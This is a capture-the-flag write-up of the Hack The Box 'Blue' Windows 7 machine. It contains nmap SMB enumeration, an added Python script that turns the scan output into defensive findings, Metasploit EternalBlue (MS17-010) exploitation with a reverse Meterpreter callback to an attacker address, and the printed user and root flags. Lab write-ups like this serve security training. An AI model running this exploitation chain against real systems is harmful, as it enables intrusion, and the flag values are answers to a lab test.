Blue

About this machine: HTB

Operating system: Windows

Skills used:

  • SMB

  • EternalBlue (MS17-010)

First scan (all TCP ports):

nmap -p- --open -sS -T4 -Pn -n 10.10.10.40 -oN First_Scann
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-25 21:20 EDT
Nmap scan report for 10.10.10.40
Host is up (0.14s latency).
Not shown: 65421 closed tcp ports (reset), 105 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 45.79 seconds

Version and default-script scan on the SMB/RPC ports:

nmap -p139,135,445 -sVC -n 10.10.10.40 -oN SVC_Scann
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-25 21:22 EDT
Nmap scan report for 10.10.10.40
Host is up (0.14s latency).

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-05-26T02:22:42+01:00
| smb2-time:
|   date: 2025-05-26T01:22:43
|_  start_date: 2025-05-26T01:19:04
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -20m04s, deviation: 34m36s, median: -5s

We enumerate the SMB shares:

nmap --script smb-enum-shares.nse -p445 -n 10.10.10.40
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-25 21:32 EDT
Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Stats: 0:00:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.10.40
Host is up (0.14s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.40\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access:
|     Current user access:
|   \\10.10.10.40\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access:
|     Current user access:
|   \\10.10.10.40\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\10.10.10.40\Share:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access:
|     Current user access: READ
|   \\10.10.10.40\Users:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access:
|_    Current user access: READ
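The three scans above already contain everything a defender would triage on this host: the OS build, the fact that the server accepted a guest session, the SMB signing modes, and the per-share access. The script below is an added example (not part of the original writeup) that parses that nmap NSE output shape and turns it into findings with a remediation hint. SAMPLE_REPORT is constructed from the scan results shown above, trimmed to the relevant lines; the finding codes and recommendation strings are this example's own.

```python
"""Triage an nmap -oN SMB report (added example, not from the original writeup).

Parses the smb-os-discovery / smb-security-mode / smb2-security-mode /
smb-enum-shares output produced above and lists what a defender should fix.
SAMPLE_REPORT is constructed from the scan output in this writeup.
"""
import re

SAMPLE_REPORT = """\
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb-enum-shares:
|   account_used: guest
|   \\\\10.10.10.40\\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Anonymous access:
|     Current user access:
|   \\\\10.10.10.40\\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\\\10.10.10.40\\Share:
|     Type: STYPE_DISKTREE
|     Anonymous access:
|     Current user access: READ
|   \\\\10.10.10.40\\Users:
|     Type: STYPE_DISKTREE
|     Anonymous access:
|_    Current user access: READ
"""

# Matches "\\host\SHARE:" once the leading "|" and indentation are stripped.
SHARE_RE = re.compile(r"^\\\\[^\\]+\\(\S+):$")


def _value(line, key):
    """Text after 'key', normalised so a blank or '<none>' field becomes ''."""
    val = line[len(key):].strip()
    return "" if val in ("", "<none>") else val


def parse_report(text):
    """Collect OS banner, session account, signing modes and share ACLs."""
    report = {"os": "", "account_used": "", "smb1_signing": "",
              "smb2_signing": "", "shares": {}}
    share = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue  # only NSE script lines carry the facts we want
        line = raw.lstrip("|_ ").rstrip()
        m = SHARE_RE.match(line)
        if m:
            share = m.group(1)
            report["shares"][share] = {"type": "", "anonymous": "", "current": ""}
        elif line.startswith("OS:"):
            report["os"] = _value(line, "OS:")
        elif line.startswith("account_used:"):
            report["account_used"] = _value(line, "account_used:")
        elif line.startswith("message_signing:"):
            report["smb1_signing"] = _value(line, "message_signing:")
        elif line.startswith("Message signing"):
            report["smb2_signing"] = line
        elif share and line.startswith("Type:"):
            report["shares"][share]["type"] = _value(line, "Type:")
        elif share and line.startswith("Anonymous access:"):
            report["shares"][share]["anonymous"] = _value(line, "Anonymous access:")
        elif share and line.startswith("Current user access:"):
            report["shares"][share]["current"] = _value(line, "Current user access:")
    return report


def assess(report):
    """Turn parsed facts into (code, share_or_None, recommendation) findings."""
    findings = []
    if "disabled" in report["smb1_signing"]:
        findings.append(("SMB1_SIGNING_DISABLED", None,
                         "SMB1 signing is off; require signing or disable SMBv1"))
    if "not required" in report["smb2_signing"]:
        findings.append(("SMB2_SIGNING_NOT_REQUIRED", None,
                         "SMB2 signing is optional; set RequireSecuritySignature"))
    if report["account_used"] == "guest":
        findings.append(("GUEST_SESSION", None,
                         "server accepted a guest session; disable guest/null access"))
    if "Windows 7" in report["os"]:
        findings.append(("LEGACY_OS", None,
                         "Windows 7 is out of support; verify MS17-010 is patched and SMBv1 is disabled"))
    for name, acl in report["shares"].items():
        if acl["anonymous"]:
            findings.append(("ANON_ACCESS", name, f"anonymous {acl['anonymous']} on {name}"))
        if report["account_used"] == "guest" and acl["current"]:
            findings.append(("GUEST_ACCESS", name, f"guest has {acl['current']} on {name}"))
    return findings


if __name__ == "__main__":
    for code, share, advice in assess(parse_report(SAMPLE_REPORT)):
        print(f"{code:26} {share or '-':8} {advice}")
```

Run against the constructed sample it reports the two signing findings, the guest session, the legacy OS, anonymous READ on IPC$ and guest READ/WRITE or READ on IPC$, Share and Users; the hidden ADMIN$ share, which showed no access, produces nothing. Feeding it a real `-oN` file from the same scripts works the same way, since only the `|`-prefixed NSE lines are consulted.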

The target is Windows 7 SP1 exposing SMB, so we see it is vulnerable to MS17-010 and use Metasploit to get in:

msfconsole

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

[msf](Jobs:0 Agents:0) >> use 0
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set rhosts 10.10.10.40
rhosts => 10.10.10.40
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set lhost 10.10.14.3

We are in; now we look for the flags:

(Meterpreter 1)(C:\Windows\system32) > cd c://
(Meterpreter 1)(c:) > dir
Listing: c:\

Mode              Size   Type  Last modified              Name
040777/rwxrwxrwx  0      dir   2017-07-21 02:56:27 -0400  $Recycle.Bin
040777/rwxrwxrwx  0      dir   2022-02-18 10:11:31 -0500  Config.Msi
040777/rwxrwxrwx  0      dir   2009-07-14 01:08:56 -0400  Documents and Settings
040777/rwxrwxrwx  0      dir   2009-07-13 23:20:08 -0400  PerfLogs
040555/r-xr-xr-x  4096   dir   2022-02-18 10:02:50 -0500  Program Files
040555/r-xr-xr-x  4096   dir   2017-07-14 12:58:41 -0400  Program Files (x86)
040777/rwxrwxrwx  4096   dir   2017-12-23 21:23:01 -0500  ProgramData
040777/rwxrwxrwx  0      dir   2022-02-18 09:09:14 -0500  Recovery
040777/rwxrwxrwx  0      dir   2017-07-14 09:48:44 -0400  Share
040777/rwxrwxrwx  4096   dir   2025-05-25 21:43:43 -0400  System Volume Information
040555/r-xr-xr-x  4096   dir   2017-07-21 02:56:23 -0400  Users
040777/rwxrwxrwx  16384  dir   2025-05-25 21:28:20 -0400  Windows
000000/---------  0      fif   1969-12-31 19:00:00 -0500  pagefile.sys

(Meterpreter 1)(c:) > cd users
(Meterpreter 1)(c:\users) > dir
Listing: c:\user

Mode              Size  Type  Last modified              Name
040777/rwxrwxrwx  8192  dir   2017-07-21 02:56:36 -0400  Administrator
040777/rwxrwxrwx  0     dir   2009-07-14 01:08:56 -0400  All Users
040555/r-xr-xr-x  8192  dir   2009-07-14 03:07:31 -0400  Default
040777/rwxrwxrwx  0     dir   2009-07-14 01:08:56 -0400  Default User
040555/r-xr-xr-x  4096  dir   2011-04-12 03:51:29 -0400  Public
100666/rw-rw-rw-  174   fil   2009-07-14 00:54:24 -0400  desktop.ini
040777/rwxrwxrwx  8192  dir   2017-07-14 09:45:53 -0400  haris

(Meterpreter 1)(c:\users) > cd haris
(Meterpreter 1)(c:\users\haris) > dir
Listing: c:\users\haris

Mode              Size    Type  Last modified              Name
040777/rwxrwxrwx  0       dir   2017-07-14 09:45:37 -0400  AppData
040777/rwxrwxrwx  0       dir   2017-07-14 09:45:37 -0400  Application Data
040555/r-xr-xr-x  0       dir   2017-07-15 03:58:33 -0400  Contacts
040777/rwxrwxrwx  0       dir   2017-07-14 09:45:37 -0400  Cookies
040555/r-xr-xr-x  0       dir   2017-12-23 21:23:23 -0500  Desktop
040555/r-xr-xr-x  4096    dir   2017-07-15 03:58:33 -0400  Documents
040555/r-xr-xr-x  0       dir   2017-07-15 03:58:33 -0400  Downloads
040555/r-xr-xr-x  4096    dir   2017-07-15 03:58:33 -0400  Favorites
040555/r-xr-xr-x  0       dir   2017-07-15 03:58:33 -0400  Links
040777/rwxrwxrwx  0       dir   2017-07-14 09:45:37 -0400  Local Settings
040555/r-xr-xr-x  0       dir   2017-07-15 03:58:33 -0400  Music
040777/rwxrwxrwx  0       dir   2017-07-14 09:45:37 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2021-01-15 04:41:00 -0500  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-07-14 10:03:15 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-07-14 10:03:15 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-07-14 10:03:15 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx  0       dir   2017-07-14 09:45:37 -0400  NetHood
040555/r-xr-xr-x  0       dir   2017-07-15 03:58:32 -0400  Pictures
040777/rwxrwxrwx  0       dir   2017-07-14 09:45:37 -0400  PrintHood
040777/rwxrwxrwx  0       dir   2017-07-14 09:45:37 -0400  Recent
040555/r-xr-xr-x  0       dir   2017-07-15 03:58:33 -0400  Saved Games
040555/r-xr-xr-x  0       dir   2017-07-15 03:58:33 -0400  Searches
040777/rwxrwxrwx  0       dir   2017-07-14 09:45:37 -0400  SendTo
040777/rwxrwxrwx  0       dir   2017-07-14 09:45:37 -0400  Start Menu
040777/rwxrwxrwx  0       dir   2017-07-14 09:45:37 -0400  Templates
040555/r-xr-xr-x  0       dir   2017-07-15 03:58:32 -0400  Videos
100666/rw-rw-rw-  262144  fil   2025-05-25 21:44:05 -0400  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-07-14 09:45:36 -0400  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-07-14 09:45:37 -0400  ntuser.ini

(Meterpreter 1)(c:\users\haris) > cd Desktop
(Meterpreter 1)(c:\users\haris\Desktop) > dir
Listing: c:\users\haris\Desktop

Mode              Size  Type  Last modified              Name
100666/rw-rw-rw-  282   fil   2017-07-15 03:58:32 -0400  desktop.ini
100444/r--r--r--  34    fil   2025-05-25 21:20:01 -0400  user.txt

(Meterpreter 1)(c:\users\haris\Desktop) > cat user.txt
f5aebf0a03c650ec5c87833638193a70

(Meterpreter 1)(c:\USers) > dir
Listing: c:\USers

Mode              Size  Type  Last modified              Name
040777/rwxrwxrwx  8192  dir   2017-07-21 02:56:36 -0400  Administrator
040777/rwxrwxrwx  0     dir   2009-07-14 01:08:56 -0400  All Users
040555/r-xr-xr-x  8192  dir   2009-07-14 03:07:31 -0400  Default
040777/rwxrwxrwx  0     dir   2009-07-14 01:08:56 -0400  Default User
040555/r-xr-xr-x  4096  dir   2011-04-12 03:51:29 -0400  Public
100666/rw-rw-rw-  174   fil   2009-07-14 00:54:24 -0400  desktop.ini
040777/rwxrwxrwx  8192  dir   2017-07-14 09:45:53 -0400  haris

(Meterpreter 1)(c:\USers) > cd Administrator
(Meterpreter 1)(c:\USers\Administrator) > dir
Listing: c:\USers\Administrator

Mode              Size    Type  Last modified              Name
040777/rwxrwxrwx  0       dir   2025-05-25 21:20:01 -0400  AppData
040777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  Application Data
040555/r-xr-xr-x  0       dir   2017-07-21 02:56:40 -0400  Contacts
040777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  Cookies
040555/r-xr-xr-x  0       dir   2017-12-23 21:22:48 -0500  Desktop
040555/r-xr-xr-x  4096    dir   2017-07-21 02:56:40 -0400  Documents
040555/r-xr-xr-x  4096    dir   2022-02-18 10:21:10 -0500  Downloads
040555/r-xr-xr-x  0       dir   2017-07-21 02:56:42 -0400  Favorites
040555/r-xr-xr-x  0       dir   2017-07-21 02:56:40 -0400  Links
040777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  Local Settings
040555/r-xr-xr-x  0       dir   2017-07-21 02:56:40 -0400  Music
040777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2025-05-25 21:20:04 -0400  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-07-21 02:57:29 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-07-21 02:57:29 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-07-21 02:57:29 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  NetHood
040555/r-xr-xr-x  0       dir   2017-07-21 02:56:40 -0400  Pictures
040777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  PrintHood
040777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  Recent
040555/r-xr-xr-x  0       dir   2017-07-21 02:56:40 -0400  Saved Games
040555/r-xr-xr-x  0       dir   2017-07-21 02:56:40 -0400  Searches
040777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  SendTo
040777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  Start Menu
040777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  Templates
040555/r-xr-xr-x  0       dir   2017-07-21 02:56:40 -0400  Videos
100666/rw-rw-rw-  262144  fil   2025-05-25 21:44:05 -0400  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-07-21 02:56:24 -0400  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-07-21 02:56:24 -0400  ntuser.ini

(Meterpreter 1)(c:\USers\Administrator) > cd Desktop
(Meterpreter 1)(c:\USers\Administrator\Desktop) > dir
Listing: c:\USers\Administrator\Desktop

Mode              Size  Type  Last modified              Name
100666/rw-rw-rw-  282   fil   2017-07-21 02:56:40 -0400  desktop.ini
100444/r--r--r--  34    fil   2025-05-25 21:20:01 -0400  root.txt

(Meterpreter 1)(c:\USers\Administrator\Desktop) > cat root.txt
68aa41e8bfa9636154c25586e151ffdd

And with this flag we consider the machine finished.
